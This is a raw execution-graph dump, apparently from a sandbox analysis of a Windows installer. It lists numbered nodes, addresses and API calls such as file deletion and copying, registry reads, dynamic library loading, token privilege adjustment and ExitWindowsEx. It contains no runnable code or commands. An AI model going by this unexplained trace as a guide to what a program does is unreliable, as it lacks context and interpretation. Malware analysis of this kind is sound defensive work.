              execution_graph 3057 401941 3058 401943 3057->3058 3063 402da6 3058->3063 3064 402db2 3063->3064 3105 4066ab 3064->3105 3067 401948 3069 405d7a 3067->3069 3147 406045 3069->3147 3072 405da2 DeleteFileW 3102 401951 3072->3102 3073 405db9 3075 405ed9 3073->3075 3161 40666e lstrcpynW 3073->3161 3075->3102 3190 4069a4 FindFirstFileW 3075->3190 3076 405ddf 3077 405df2 3076->3077 3078 405de5 lstrcatW 3076->3078 3162 405f89 lstrlenW 3077->3162 3079 405df8 3078->3079 3082 405e08 lstrcatW 3079->3082 3084 405e13 lstrlenW FindFirstFileW 3079->3084 3082->3084 3084->3075 3085 405e35 3084->3085 3088 405ebc FindNextFileW 3085->3088 3098 405d7a 60 API calls 3085->3098 3101 4056d0 24 API calls 3085->3101 3166 40666e lstrcpynW 3085->3166 3167 405d32 3085->3167 3175 4056d0 3085->3175 3186 40642e MoveFileExW 3085->3186 3088->3085 3091 405ed2 FindClose 3088->3091 3089 405d32 5 API calls 3092 405f14 3089->3092 3091->3075 3093 405f18 3092->3093 3094 405f2e 3092->3094 3097 4056d0 24 API calls 3093->3097 3093->3102 3096 4056d0 24 API calls 3094->3096 3096->3102 3099 405f25 3097->3099 3098->3085 3100 40642e 36 API calls 3099->3100 3100->3102 3101->3088 3107 4066b8 3105->3107 3106 4068db 3108 402dd3 3106->3108 3138 40666e lstrcpynW 3106->3138 3107->3106 3110 4068a9 lstrlenW 3107->3110 3113 4066ab 10 API calls 3107->3113 3114 4067c0 GetSystemDirectoryW 3107->3114 3116 4067d3 GetWindowsDirectoryW 3107->3116 3117 40684a lstrcatW 3107->3117 3118 4066ab 10 API calls 3107->3118 3119 4068f5 5 API calls 3107->3119 3120 406802 SHGetSpecialFolderLocation 3107->3120 3131 40653c 3107->3131 3136 4065b5 wsprintfW 3107->3136 3137 40666e lstrcpynW 3107->3137 3108->3067 3122 4068f5 3108->3122 3110->3107 3113->3110 3114->3107 3116->3107 3117->3107 3118->3107 3119->3107 3120->3107 3121 40681a SHGetPathFromIDListW CoTaskMemFree 3120->3121 3121->3107 3128 406902 3122->3128 3123 40697d CharPrevW 3124 406978 3123->3124 3124->3123 3126 40699e 3124->3126 3125 40696b CharNextW 3125->3124 3125->3128 3126->3067 3128->3124 3128->3125 3129 406957 CharNextW 3128->3129 3130 406966 CharNextW 3128->3130 3143 405f6a 3128->3143 3129->3128 3130->3125 3139 4064db 3131->3139 3134 406570 RegQueryValueExW RegCloseKey 3135 4065a0 3134->3135 3135->3107 3136->3107 3137->3107 3138->3108 3140 4064ea 3139->3140 3141 4064f3 RegOpenKeyExW 3140->3141 3142 4064ee 3140->3142 3141->3142 3142->3134 3142->3135 3144 405f70 3143->3144 3145 405f86 3144->3145 3146 405f77 CharNextW 3144->3146 3145->3128 3146->3144 3196 40666e lstrcpynW 3147->3196 3149 406056 3197 405fe8 CharNextW CharNextW 3149->3197 3152 405d9a 3152->3072 3152->3073 3153 4068f5 5 API calls 3159 40606c 3153->3159 3154 40609d lstrlenW 3155 4060a8 3154->3155 3154->3159 3156 405f3d 3 API calls 3155->3156 3158 4060ad GetFileAttributesW 3156->3158 3157 4069a4 2 API calls 3157->3159 3158->3152 3159->3152 3159->3154 3159->3157 3160 405f89 2 API calls 3159->3160 3160->3154 3161->3076 3163 405f97 3162->3163 3164 405fa9 3163->3164 3165 405f9d CharPrevW 3163->3165 3164->3079 3165->3163 3165->3164 3166->3085 3203 406139 GetFileAttributesW 3167->3203 3170 405d5f 3170->3085 3171 405d55 DeleteFileW 3173 405d5b 3171->3173 3172 405d4d RemoveDirectoryW 3172->3173 3173->3170 3174 405d6b SetFileAttributesW 3173->3174 3174->3170 3176 40578d 3175->3176 3178 4056eb 3175->3178 3176->3085 3177 405707 lstrlenW 3180 405730 3177->3180 3181 405715 lstrlenW 3177->3181 3178->3177 3179 4066ab 17 API calls 3178->3179 3179->3177 3183 405743 3180->3183 3184 405736 SetWindowTextW 3180->3184 3181->3176 3182 405727 lstrcatW 3181->3182 3182->3180 3183->3176 3185 405749 SendMessageW SendMessageW SendMessageW 3183->3185 3184->3183 3185->3176 3187 406442 3186->3187 3189 40644f 3186->3189 3206 4062b4 3187->3206 3189->3085 3191 405efe 3190->3191 3192 4069ba FindClose 3190->3192 3191->3102 3193 405f3d lstrlenW CharPrevW 3191->3193 3192->3191 3194 405f08 3193->3194 3195 405f59 lstrcatW 3193->3195 3194->3089 3195->3194 3196->3149 3198 406005 3197->3198 3200 406017 3197->3200 3199 406012 CharNextW 3198->3199 3198->3200 3202 40603b 3199->3202 3201 405f6a CharNextW 3200->3201 3200->3202 3201->3200 3202->3152 3202->3153 3204 405d3e 3203->3204 3205 40614b SetFileAttributesW 3203->3205 3204->3170 3204->3171 3204->3172 3205->3204 3207 4062e4 3206->3207 3208 40630a GetShortPathNameW 3206->3208 3233 40615e GetFileAttributesW CreateFileW 3207->3233 3210 406429 3208->3210 3211 40631f 3208->3211 3210->3189 3211->3210 3213 406327 wsprintfA 3211->3213 3212 4062ee CloseHandle GetShortPathNameW 3212->3210 3214 406302 3212->3214 3215 4066ab 17 API calls 3213->3215 3214->3208 3214->3210 3216 40634f 3215->3216 3234 40615e GetFileAttributesW CreateFileW 3216->3234 3218 40635c 3218->3210 3219 40636b GetFileSize GlobalAlloc 3218->3219 3220 406422 CloseHandle 3219->3220 3221 40638d 3219->3221 3220->3210 3235 4061e1 ReadFile 3221->3235 3226 4063c0 3228 4060c3 4 API calls 3226->3228 3227 4063ac lstrcpyA 3229 4063ce 3227->3229 3228->3229 3230 406405 SetFilePointer 3229->3230 3242 406210 WriteFile 3230->3242 3233->3212 3234->3218 3236 4061ff 3235->3236 3236->3220 3237 4060c3 lstrlenA 3236->3237 3238 406104 lstrlenA 3237->3238 3239 40610c 3238->3239 3240 4060dd lstrcmpiA 3238->3240 3239->3226 3239->3227 3240->3239 3241 4060fb CharNextA 3240->3241 3241->3238 3243 40622e GlobalFree 3242->3243 3243->3220 3244 4015c1 3245 402da6 17 API calls 3244->3245 3246 4015c8 3245->3246 3247 405fe8 4 API calls 3246->3247 3259 4015d1 3247->3259 3248 401631 3250 401663 3248->3250 3251 401636 3248->3251 3249 405f6a CharNextW 3249->3259 3253 401423 24 API calls 3250->3253 3271 401423 3251->3271 3261 40165b 3253->3261 3258 40164a SetCurrentDirectoryW 3258->3261 3259->3248 3259->3249 3260 401617 GetFileAttributesW 3259->3260 3263 405c39 3259->3263 3266 405b9f CreateDirectoryW 3259->3266 3275 405c1c CreateDirectoryW 3259->3275 3260->3259 3278 406a3b GetModuleHandleA 3263->3278 3267 405bf0 GetLastError 3266->3267 3268 405bec 3266->3268 3267->3268 3269 405bff SetFileSecurityW 3267->3269 3268->3259 3269->3268 3270 405c15 GetLastError 3269->3270 3270->3268 3272 4056d0 24 API calls 3271->3272 3273 401431 3272->3273 3274 40666e lstrcpynW 3273->3274 3274->3258 3276 405c30 GetLastError 3275->3276 3277 405c2c 3275->3277 3276->3277 3277->3259 3279 406a61 GetProcAddress 3278->3279 3280 406a57 3278->3280 3281 405c40 3279->3281 3284 4069cb GetSystemDirectoryW 3280->3284 3281->3259 3283 406a5d 3283->3279 3283->3281 3285 4069ed wsprintfW LoadLibraryExW 3284->3285 3285->3283 3759 401c43 3781 402d84 3759->3781 3761 401c4a 3762 402d84 17 API calls 3761->3762 3763 401c57 3762->3763 3764 401c6c 3763->3764 3765 402da6 17 API calls 3763->3765 3766 401c7c 3764->3766 3767 402da6 17 API calls 3764->3767 3765->3764 3768 401cd3 3766->3768 3769 401c87 3766->3769 3767->3766 3770 402da6 17 API calls 3768->3770 3771 402d84 17 API calls 3769->3771 3772 401cd8 3770->3772 3773 401c8c 3771->3773 3774 402da6 17 API calls 3772->3774 3775 402d84 17 API calls 3773->3775 3776 401ce1 FindWindowExW 3774->3776 3777 401c98 3775->3777 3780 401d03 3776->3780 3778 401cc3 SendMessageW 3777->3778 3779 401ca5 SendMessageTimeoutW 3777->3779 3778->3780 3779->3780 3782 4066ab 17 API calls 3781->3782 3783 402d99 3782->3783 3783->3761 3784 405644 3785 405654 3784->3785 3786 405668 3784->3786 3788 4056b1 3785->3788 3789 40565a 3785->3789 3787 405670 IsWindowVisible 3786->3787 3795 405687 3786->3795 3787->3788 3790 40567d 3787->3790 3791 4056b6 CallWindowProcW 3788->3791 3792 404616 SendMessageW 3789->3792 3797 404f85 SendMessageW 3790->3797 3794 405664 3791->3794 3792->3794 3795->3791 3802 405005 3795->3802 3798 404fe4 SendMessageW 3797->3798 3799 404fa8 GetMessagePos ScreenToClient SendMessageW 3797->3799 3801 404fdc 3798->3801 3800 404fe1 3799->3800 3799->3801 3800->3798 3801->3795 3811 40666e lstrcpynW 3802->3811 3804 405018 3812 4065b5 wsprintfW 3804->3812 3806 405022 3807 40140b 2 API calls 3806->3807 3808 40502b 3807->3808 3813 40666e lstrcpynW 3808->3813 3810 405032 3810->3788 3811->3804 3812->3806 3813->3810 3814 4028c4 3815 4028ca 3814->3815 3816 4028d2 FindClose 3815->3816 3817 402c2a 3815->3817 3816->3817 3315 403646 SetErrorMode GetVersionExW 3316 4036d0 3315->3316 3317 403698 GetVersionExW 3315->3317 3318 403729 3316->3318 3319 406a3b 5 API calls 3316->3319 3317->3316 3320 4069cb 3 API calls 3318->3320 3319->3318 3321 40373f lstrlenA 3320->3321 3321->3318 3322 40374f 3321->3322 3323 406a3b 5 API calls 3322->3323 3324 403756 3323->3324 3325 406a3b 5 API calls 3324->3325 3326 40375d 3325->3326 3327 406a3b 5 API calls 3326->3327 3328 403769 #17 OleInitialize SHGetFileInfoW 3327->3328 3405 40666e lstrcpynW 3328->3405 3331 4037b6 GetCommandLineW 3406 40666e lstrcpynW 3331->3406 3333 4037c8 3334 405f6a CharNextW 3333->3334 3335 4037ee CharNextW 3334->3335 3345 4037ff 3335->3345 3336 4038fd 3337 403911 GetTempPathW 3336->3337 3407 403615 3337->3407 3339 403929 3340 403983 DeleteFileW 3339->3340 3341 40392d GetWindowsDirectoryW lstrcatW 3339->3341 3417 4030d0 GetTickCount GetModuleFileNameW 3340->3417 3343 403615 12 API calls 3341->3343 3342 405f6a CharNextW 3342->3345 3346 403949 3343->3346 3345->3336 3345->3342 3349 4038ff 3345->3349 3346->3340 3348 40394d GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3346->3348 3347 403996 3350 403b72 ExitProcess OleUninitialize 3347->3350 3354 403a4b 3347->3354 3360 405f6a CharNextW 3347->3360 3353 403615 12 API calls 3348->3353 3502 40666e lstrcpynW 3349->3502 3351 403b82 3350->3351 3352 403b97 3350->3352 3507 405cce 3351->3507 3357 403c15 ExitProcess 3352->3357 3358 403b9f GetCurrentProcess OpenProcessToken 3352->3358 3359 40397b 3353->3359 3446 403d1d 3354->3446 3365 403be5 3358->3365 3366 403bb6 LookupPrivilegeValueW AdjustTokenPrivileges 3358->3366 3359->3340 3359->3350 3371 4039b8 3360->3371 3362 403a5a 3362->3350 3367 406a3b 5 API calls 3365->3367 3366->3365 3370 403bec 3367->3370 3368 403a21 3373 406045 18 API calls 3368->3373 3369 403a62 3372 405c39 5 API calls 3369->3372 3374 403c01 ExitWindowsEx 3370->3374 3375 403c0e 3370->3375 3371->3368 3371->3369 3376 403a67 lstrcatW 3372->3376 3377 403a2d 3373->3377 3374->3357 3374->3375 3511 40140b 3375->3511 3379 403a83 lstrcatW lstrcmpiW 3376->3379 3380 403a78 lstrcatW 3376->3380 3377->3350 3503 40666e lstrcpynW 3377->3503 3379->3362 3381 403aa3 3379->3381 3380->3379 3383 403aa8 3381->3383 3384 403aaf 3381->3384 3386 405b9f 4 API calls 3383->3386 3387 405c1c 2 API calls 3384->3387 3385 403a40 3504 40666e lstrcpynW 3385->3504 3389 403aad 3386->3389 3390 403ab4 SetCurrentDirectoryW 3387->3390 3389->3390 3391 403ad1 3390->3391 3392 403ac6 3390->3392 3506 40666e lstrcpynW 3391->3506 3505 40666e lstrcpynW 3392->3505 3395 4066ab 17 API calls 3396 403b13 DeleteFileW 3395->3396 3397 403b1f CopyFileW 3396->3397 3402 403ade 3396->3402 3397->3402 3398 403b69 3399 40642e 36 API calls 3398->3399 3399->3362 3400 40642e 36 API calls 3400->3402 3401 4066ab 17 API calls 3401->3402 3402->3395 3402->3398 3402->3400 3402->3401 3403 405c51 2 API calls 3402->3403 3404 403b53 CloseHandle 3402->3404 3403->3402 3404->3402 3405->3331 3406->3333 3408 4068f5 5 API calls 3407->3408 3410 403621 3408->3410 3409 40362b 3409->3339 3410->3409 3411 405f3d 3 API calls 3410->3411 3412 403633 3411->3412 3413 405c1c 2 API calls 3412->3413 3414 403639 3413->3414 3514 40618d 3414->3514 3518 40615e GetFileAttributesW CreateFileW 3417->3518 3419 403113 3445 403120 3419->3445 3519 40666e lstrcpynW 3419->3519 3421 403136 3422 405f89 2 API calls 3421->3422 3423 40313c 3422->3423 3520 40666e lstrcpynW 3423->3520 3425 403147 GetFileSize 3426 403246 3425->3426 3428 40315e 3425->3428 3521 40302e 3426->3521 3428->3426 3432 4032e4 3428->3432 3439 40302e 32 API calls 3428->3439 3428->3445 3552 4035e8 3428->3552 3430 403289 GlobalAlloc 3435 40618d 2 API calls 3430->3435 3433 40302e 32 API calls 3432->3433 3433->3445 3437 4032b4 CreateFileW 3435->3437 3436 40326a 3438 4035e8 ReadFile 3436->3438 3440 4032ee 3437->3440 3437->3445 3442 403275 3438->3442 3439->3428 3536 4035fe SetFilePointer 3440->3536 3442->3430 3442->3445 3443 4032fc 3537 403377 3443->3537 3445->3347 3447 406a3b 5 API calls 3446->3447 3448 403d31 3447->3448 3449 403d37 GetUserDefaultUILanguage 3448->3449 3450 403d49 3448->3450 3572 4065b5 wsprintfW 3449->3572 3452 40653c 3 API calls 3450->3452 3454 403d79 3452->3454 3453 403d47 3573 403ff3 3453->3573 3455 403d98 lstrcatW 3454->3455 3456 40653c 3 API calls 3454->3456 3455->3453 3456->3455 3459 406045 18 API calls 3460 403dca 3459->3460 3461 403e5e 3460->3461 3463 40653c 3 API calls 3460->3463 3462 406045 18 API calls 3461->3462 3464 403e64 3462->3464 3465 403dfc 3463->3465 3466 403e74 LoadImageW 3464->3466 3467 4066ab 17 API calls 3464->3467 3465->3461 3470 403e1d lstrlenW 3465->3470 3474 405f6a CharNextW 3465->3474 3468 403f1a 3466->3468 3469 403e9b RegisterClassW 3466->3469 3467->3466 3473 40140b 2 API calls 3468->3473 3471 403ed1 SystemParametersInfoW CreateWindowExW 3469->3471 3472 403f24 3469->3472 3475 403e51 3470->3475 3476 403e2b lstrcmpiW 3470->3476 3471->3468 3472->3362 3477 403f20 3473->3477 3478 403e1a 3474->3478 3480 405f3d 3 API calls 3475->3480 3476->3475 3479 403e3b GetFileAttributesW 3476->3479 3477->3472 3483 403ff3 18 API calls 3477->3483 3478->3470 3482 403e47 3479->3482 3481 403e57 3480->3481 3581 40666e lstrcpynW 3481->3581 3482->3475 3486 405f89 2 API calls 3482->3486 3484 403f31 3483->3484 3487 403fc0 3484->3487 3488 403f3d ShowWindow 3484->3488 3486->3475 3582 4057a3 OleInitialize 3487->3582 3489 4069cb 3 API calls 3488->3489 3494 403f55 3489->3494 3491 403fc6 3492 403fe2 3491->3492 3495 403fca 3491->3495 3496 40140b 2 API calls 3492->3496 3493 403f63 GetClassInfoW 3498 403f77 GetClassInfoW RegisterClassW 3493->3498 3499 403f8d DialogBoxParamW 3493->3499 3494->3493 3497 4069cb 3 API calls 3494->3497 3495->3472 3500 40140b 2 API calls 3495->3500 3496->3472 3497->3493 3498->3499 3501 40140b 2 API calls 3499->3501 3500->3472 3501->3472 3502->3337 3503->3385 3504->3354 3505->3391 3506->3402 3508 405ce3 3507->3508 3509 403b8f ExitProcess 3508->3509 3510 405cf7 MessageBoxIndirectW 3508->3510 3510->3509 3512 401389 2 API calls 3511->3512 3513 401420 3512->3513 3513->3357 3515 40619a GetTickCount GetTempFileNameW 3514->3515 3516 4061d0 3515->3516 3517 403644 3515->3517 3516->3515 3516->3517 3517->3339 3518->3419 3519->3421 3520->3425 3522 403057 3521->3522 3523 40303f 3521->3523 3526 403067 GetTickCount 3522->3526 3527 40305f 3522->3527 3524 403048 DestroyWindow 3523->3524 3525 40304f 3523->3525 3524->3525 3525->3430 3525->3445 3555 4035fe SetFilePointer 3525->3555 3526->3525 3529 403075 3526->3529 3528 406a77 2 API calls 3527->3528 3528->3525 3530 4030aa CreateDialogParamW ShowWindow 3529->3530 3531 40307d 3529->3531 3530->3525 3531->3525 3556 403012 3531->3556 3533 40308b wsprintfW 3534 4056d0 24 API calls 3533->3534 3535 4030a8 3534->3535 3535->3525 3536->3443 3538 4033a2 3537->3538 3539 403386 SetFilePointer 3537->3539 3559 40347f GetTickCount 3538->3559 3539->3538 3542 40343f 3542->3445 3543 4061e1 ReadFile 3544 4033c2 3543->3544 3544->3542 3545 40347f 38 API calls 3544->3545 3546 4033d9 3545->3546 3546->3542 3547 403445 ReadFile 3546->3547 3549 4033e8 3546->3549 3547->3542 3549->3542 3550 4061e1 ReadFile 3549->3550 3551 406210 WriteFile 3549->3551 3550->3549 3551->3549 3553 4061e1 ReadFile 3552->3553 3554 4035fb 3553->3554 3554->3428 3555->3436 3557 403021 3556->3557 3558 403023 MulDiv 3556->3558 3557->3558 3558->3533 3560 4035d7 3559->3560 3561 4034ad 3559->3561 3562 40302e 32 API calls 3560->3562 3571 4035fe SetFilePointer 3561->3571 3568 4033a9 3562->3568 3564 4034b8 SetFilePointer 3567 4034dd 3564->3567 3565 4035e8 ReadFile 3565->3567 3566 40302e 32 API calls 3566->3567 3567->3565 3567->3566 3567->3568 3569 406210 WriteFile 3567->3569 3570 4035b8 SetFilePointer 3567->3570 3568->3542 3568->3543 3569->3567 3570->3560 3571->3564 3572->3453 3574 404007 3573->3574 3589 4065b5 wsprintfW 3574->3589 3576 404078 3590 4040ac 3576->3590 3578 403da8 3578->3459 3579 40407d 3579->3578 3580 4066ab 17 API calls 3579->3580 3580->3579 3581->3461 3593 404616 3582->3593 3584 4057c6 3588 4057ed 3584->3588 3596 401389 3584->3596 3585 404616 SendMessageW 3586 4057ff OleUninitialize 3585->3586 3586->3491 3588->3585 3589->3576 3591 4066ab 17 API calls 3590->3591 3592 4040ba SetWindowTextW 3591->3592 3592->3579 3594 40462e 3593->3594 3595 40461f SendMessageW 3593->3595 3594->3584 3595->3594 3598 401390 3596->3598 3597 4013fe 3597->3584 3598->3597 3599 4013cb MulDiv SendMessageW 3598->3599 3599->3598 3600 4040cb 3601 4040e3 3600->3601 3602 404244 3600->3602 3601->3602 3603 4040ef 3601->3603 3604 404295 3602->3604 3605 404255 GetDlgItem GetDlgItem 3602->3605 3608 4040fa SetWindowPos 3603->3608 3609 40410d 3603->3609 3607 4042ef 3604->3607 3617 401389 2 API calls 3604->3617 3676 4045ca 3605->3676 3611 404616 SendMessageW 3607->3611 3618 40423f 3607->3618 3608->3609 3612 404116 ShowWindow 3609->3612 3613 404158 3609->3613 3610 40427f KiUserCallbackDispatcher 3614 40140b 2 API calls 3610->3614 3619 404301 3611->3619 3620 404231 3612->3620 3621 404136 GetWindowLongW 3612->3621 3615 404160 DestroyWindow 3613->3615 3616 404177 3613->3616 3614->3604 3623 404574 3615->3623 3624 40417c SetWindowLongW 3616->3624 3625 40418d 3616->3625 3626 4042c7 3617->3626 3628 404555 DestroyWindow EndDialog 3619->3628 3631 40140b 2 API calls 3619->3631 3634 4066ab 17 API calls 3619->3634 3639 4045ca 18 API calls 3619->3639 3648 4045ca 18 API calls 3619->3648 3682 404631 3620->3682 3621->3620 3622 40414f ShowWindow 3621->3622 3622->3613 3623->3618 3632 404584 ShowWindow 3623->3632 3624->3618 3625->3620 3629 404199 GetDlgItem 3625->3629 3626->3607 3630 4042cb SendMessageW 3626->3630 3628->3623 3633 4041aa SendMessageW IsWindowEnabled 3629->3633 3635 4041c7 3629->3635 3630->3618 3631->3619 3632->3618 3633->3618 3633->3635 3634->3619 3636 4041cc 3635->3636 3637 4041d4 3635->3637 3640 40421b SendMessageW 3635->3640 3641 4041e7 3635->3641 3679 4045a3 3636->3679 3637->3636 3637->3640 3639->3619 3640->3620 3643 404204 3641->3643 3644 4041ef 3641->3644 3642 404202 3642->3620 3646 40140b 2 API calls 3643->3646 3645 40140b 2 API calls 3644->3645 3645->3636 3647 40420b 3646->3647 3647->3620 3647->3636 3649 40437c GetDlgItem 3648->3649 3650 404391 3649->3650 3651 404399 ShowWindow EnableWindow 3649->3651 3650->3651 3696 4045ec EnableWindow 3651->3696 3653 4043c3 EnableWindow 3658 4043d7 3653->3658 3654 4043dc GetSystemMenu EnableMenuItem SendMessageW 3655 40440c SendMessageW 3654->3655 3654->3658 3655->3658 3657 4040ac 18 API calls 3657->3658 3658->3654 3658->3657 3697 4045ff SendMessageW 3658->3697 3698 40666e lstrcpynW 3658->3698 3660 40443b lstrlenW 3661 4066ab 17 API calls 3660->3661 3662 404451 SetWindowTextW 3661->3662 3663 401389 2 API calls 3662->3663 3665 404462 3663->3665 3664 404495 DestroyWindow 3664->3623 3666 4044af CreateDialogParamW 3664->3666 3665->3618 3665->3619 3665->3664 3667 404490 3665->3667 3666->3623 3668 4044e2 3666->3668 3667->3618 3669 4045ca 18 API calls 3668->3669 3670 4044ed GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3669->3670 3671 401389 2 API calls 3670->3671 3672 404533 3671->3672 3672->3618 3673 40453b ShowWindow 3672->3673 3674 404616 SendMessageW 3673->3674 3675 404553 3674->3675 3675->3623 3677 4066ab 17 API calls 3676->3677 3678 4045d5 SetDlgItemTextW 3677->3678 3678->3610 3680 4045b0 SendMessageW 3679->3680 3681 4045aa 3679->3681 3680->3642 3681->3680 3683 404649 GetWindowLongW 3682->3683 3684 4046f4 3682->3684 3683->3684 3685 40465e 3683->3685 3684->3618 3685->3684 3686 40468b GetSysColor 3685->3686 3687 40468e 3685->3687 3686->3687 3688 404694 SetTextColor 3687->3688 3689 40469e SetBkMode 3687->3689 3688->3689 3690 4046b6 GetSysColor 3689->3690 3691 4046bc 3689->3691 3690->3691 3692 4046c3 SetBkColor 3691->3692 3693 4046cd 3691->3693 3692->3693 3693->3684 3694 4046e0 DeleteObject 3693->3694 3695 4046e7 CreateBrushIndirect 3693->3695 3694->3695 3695->3684 3696->3653 3697->3658 3698->3660 3821 4016cc 3822 402da6 17 API calls 3821->3822 3823 4016d2 GetFullPathNameW 3822->3823 3824 4016ec 3823->3824 3830 40170e 3823->3830 3827 4069a4 2 API calls 3824->3827 3824->3830 3825 401723 GetShortPathNameW 3826 402c2a 3825->3826 3828 4016fe 3827->3828 3828->3830 3831 40666e lstrcpynW 3828->3831 3830->3825 3830->3826 3831->3830 3832 401e4e GetDC 3833 402d84 17 API calls 3832->3833 3834 401e60 GetDeviceCaps MulDiv ReleaseDC 3833->3834 3835 402d84 17 API calls 3834->3835 3836 401e91 3835->3836 3837 4066ab 17 API calls 3836->3837 3838 401ece CreateFontIndirectW 3837->3838 3839 402638 3838->3839 3840 402950 3841 402da6 17 API calls 3840->3841 3843 40295c 3841->3843 3842 402972 3845 406139 2 API calls 3842->3845 3843->3842 3844 402da6 17 API calls 3843->3844 3844->3842 3846 402978 3845->3846 3868 40615e GetFileAttributesW CreateFileW 3846->3868 3848 402985 3849 402a3b 3848->3849 3852 4029a0 GlobalAlloc 3848->3852 3853 402a23 3848->3853 3850 402a42 DeleteFileW 3849->3850 3851 402a55 3849->3851 3850->3851 3852->3853 3854 4029b9 3852->3854 3855 403377 40 API calls 3853->3855 3869 4035fe SetFilePointer 3854->3869 3857 402a30 CloseHandle 3855->3857 3857->3849 3858 4029bf 3859 4035e8 ReadFile 3858->3859 3860 4029c8 GlobalAlloc 3859->3860 3861 4029d8 3860->3861 3862 402a0c 3860->3862 3863 403377 40 API calls 3861->3863 3864 406210 WriteFile 3862->3864 3867 4029e5 3863->3867 3865 402a18 GlobalFree 3864->3865 3865->3853 3866 402a03 GlobalFree 3866->3862 3867->3866 3868->3848 3869->3858 3870 401956 3871 402da6 17 API calls 3870->3871 3872 40195d lstrlenW 3871->3872 3873 402638 3872->3873 3874 4014d7 3875 402d84 17 API calls 3874->3875 3876 4014dd Sleep 3875->3876 3878 402c2a 3876->3878 3879 4020d8 3880 40219c 3879->3880 3881 4020ea 3879->3881 3884 401423 24 API calls 3880->3884 3882 402da6 17 API calls 3881->3882 3883 4020f1 3882->3883 3885 402da6 17 API calls 3883->3885 3889 4022f6 3884->3889 3886 4020fa 3885->3886 3887 402110 LoadLibraryExW 3886->3887 3888 402102 GetModuleHandleW 3886->3888 3887->3880 3890 402121 3887->3890 3888->3887 3888->3890 3899 406aaa 3890->3899 3893 402132 3896 401423 24 API calls 3893->3896 3897 402142 3893->3897 3894 40216b 3895 4056d0 24 API calls 3894->3895 3895->3897 3896->3897 3897->3889 3898 40218e FreeLibrary 3897->3898 3898->3889 3904 406690 WideCharToMultiByte 3899->3904 3901 406ac7 3902 40212c 3901->3902 3903 406ace GetProcAddress 3901->3903 3902->3893 3902->3894 3903->3902 3904->3901 3905 402b59 3906 402b60 3905->3906 3907 402bab 3905->3907 3909 402ba9 3906->3909 3911 402d84 17 API calls 3906->3911 3908 406a3b 5 API calls 3907->3908 3910 402bb2 3908->3910 3912 402da6 17 API calls 3910->3912 3913 402b6e 3911->3913 3914 402bbb 3912->3914 3915 402d84 17 API calls 3913->3915 3914->3909 3916 402bbf IIDFromString 3914->3916 3918 402b7a 3915->3918 3916->3909 3917 402bce 3916->3917 3917->3909 3923 40666e lstrcpynW 3917->3923 3922 4065b5 wsprintfW 3918->3922 3920 402beb CoTaskMemFree 3920->3909 3922->3909 3923->3920 3924 402a5b 3925 402d84 17 API calls 3924->3925 3926 402a61 3925->3926 3927 402aa4 3926->3927 3928 402a88 3926->3928 3935 40292e 3926->3935 3929 402abe 3927->3929 3930 402aae 3927->3930 3931 402a8d 3928->3931 3932 402a9e 3928->3932 3934 4066ab 17 API calls 3929->3934 3933 402d84 17 API calls 3930->3933 3938 40666e lstrcpynW 3931->3938 3932->3935 3939 4065b5 wsprintfW 3932->3939 3933->3932 3934->3932 3938->3935 3939->3935 3940 403cdb 3941 403ce6 3940->3941 3942 403cea 3941->3942 3943 403ced GlobalAlloc 3941->3943 3943->3942 3712 40175c 3713 402da6 17 API calls 3712->3713 3714 401763 3713->3714 3715 40618d 2 API calls 3714->3715 3716 40176a 3715->3716 3717 40618d 2 API calls 3716->3717 3717->3716 3944 401d5d 3945 402d84 17 API calls 3944->3945 3946 401d6e SetWindowLongW 3945->3946 3947 402c2a 3946->3947 3948 4028de 3949 4028e6 3948->3949 3950 4028ea FindNextFileW 3949->3950 3952 4028fc 3949->3952 3951 402943 3950->3951 3950->3952 3954 40666e lstrcpynW 3951->3954 3954->3952 3955 401563 3956 402ba4 3955->3956 3959 4065b5 wsprintfW 3956->3959 3958 402ba9 3959->3958 3960 401968 3961 402d84 17 API calls 3960->3961 3962 40196f 3961->3962 3963 402d84 17 API calls 3962->3963 3964 40197c 3963->3964 3965 402da6 17 API calls 3964->3965 3966 401993 lstrlenW 3965->3966 3968 4019a4 3966->3968 3967 4019e5 3968->3967 3972 40666e lstrcpynW 3968->3972 3970 4019d5 3970->3967 3971 4019da lstrlenW 3970->3971 3971->3967 3972->3970 3973 40166a 3974 402da6 17 API calls 3973->3974 3975 401670 3974->3975 3976 4069a4 2 API calls 3975->3976 3977 401676 3976->3977 3978 402aeb 3979 402d84 17 API calls 3978->3979 3981 402af1 3979->3981 3980 40292e 3981->3980 3982 4066ab 17 API calls 3981->3982 3982->3980 3983 4026ec 3984 402d84 17 API calls 3983->3984 3985 4026fb 3984->3985 3986 402745 ReadFile 3985->3986 3987 4061e1 ReadFile 3985->3987 3989 402785 MultiByteToWideChar 3985->3989 3990 40283a 3985->3990 3992 4027ab SetFilePointer MultiByteToWideChar 3985->3992 3993 40284b 3985->3993 3995 402838 3985->3995 3996 40623f SetFilePointer 3985->3996 3986->3985 3986->3995 3987->3985 3989->3985 4005 4065b5 wsprintfW 3990->4005 3992->3985 3994 40286c SetFilePointer 3993->3994 3993->3995 3994->3995 3997 40625b 3996->3997 4004 406273 3996->4004 3998 4061e1 ReadFile 3997->3998 3999 406267 3998->3999 4000 4062a4 SetFilePointer 3999->4000 4001 40627c SetFilePointer 3999->4001 3999->4004 4000->4004 4001->4000 4002 406287 4001->4002 4003 406210 WriteFile 4002->4003 4003->4004 4004->3985 4005->3995 3718 40176f 3719 402da6 17 API calls 3718->3719 3720 401776 3719->3720 3721 401796 3720->3721 3722 40179e 3720->3722 3757 40666e lstrcpynW 3721->3757 3758 40666e lstrcpynW 3722->3758 3725 40179c 3729 4068f5 5 API calls 3725->3729 3726 4017a9 3727 405f3d 3 API calls 3726->3727 3728 4017af lstrcatW 3727->3728 3728->3725 3745 4017bb 3729->3745 3730 4069a4 2 API calls 3730->3745 3731 406139 2 API calls 3731->3745 3733 4017cd CompareFileTime 3733->3745 3734 40188d 3736 4056d0 24 API calls 3734->3736 3735 401864 3737 4056d0 24 API calls 3735->3737 3746 401879 3735->3746 3739 401897 3736->3739 3737->3746 3738 40666e lstrcpynW 3738->3745 3740 403377 40 API calls 3739->3740 3741 4018aa 3740->3741 3742 4018be SetFileTime 3741->3742 3744 4018d0 FindCloseChangeNotification 3741->3744 3742->3744 3743 4066ab 17 API calls 3743->3745 3744->3746 3747 4018e1 3744->3747 3745->3730 3745->3731 3745->3733 3745->3734 3745->3735 3745->3738 3745->3743 3753 405cce MessageBoxIndirectW 3745->3753 3756 40615e GetFileAttributesW CreateFileW 3745->3756 3748 4018e6 3747->3748 3749 4018f9 3747->3749 